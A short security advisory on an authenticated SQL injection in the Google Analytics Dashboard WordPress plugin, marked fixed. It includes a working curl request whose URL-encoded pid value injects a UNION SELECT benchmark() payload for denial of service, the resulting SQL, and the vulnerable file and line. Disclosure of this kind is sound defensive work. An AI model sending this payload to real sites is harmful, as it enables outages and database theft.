Google Analytics Dashboard contains an ajax handler with an sql statement that is vulnerable to SQL injection. The attacker would have to be logged in in order for this vulnerability to be exploited.

The statement does not cause any data to be sent back to the browser, but an appropriately crafted request could be used to cause a denial of service.

The following request:

curl -i -b $WORDPRESS_SESSION_COOKIE 'http://wordpress.local/wp-admin/admin-ajax.php?action=gad_fill_ppp&pid=%34%36%20%75%6E%69%6F%6E%20%61%6C%6C%20%73%65%6C%65%63%74%20%62%65%6E%63%68%6D%61%72%6B%28%31%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%2C%6D%64%35%28%30%78%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%29%29'

Would cause this SQL statement to be run:

SELECT count(1) FROM wp_posts WHERE post_status = 'draft' AND ID = 46 union all select benchmark(1000000000000000000000,md5(0x4646464646464646464646464646464646));

Which would result in the MySQL server spending a very long time generating MD5 hashes, causing the server to stop responding to valid queries.

An attacker who knows or can work out the ID of a draft post could also extract arbitrary data from the database.

The vulnerable query is in gad-admin-pages-posts.php at line 79.

Current state: Fixed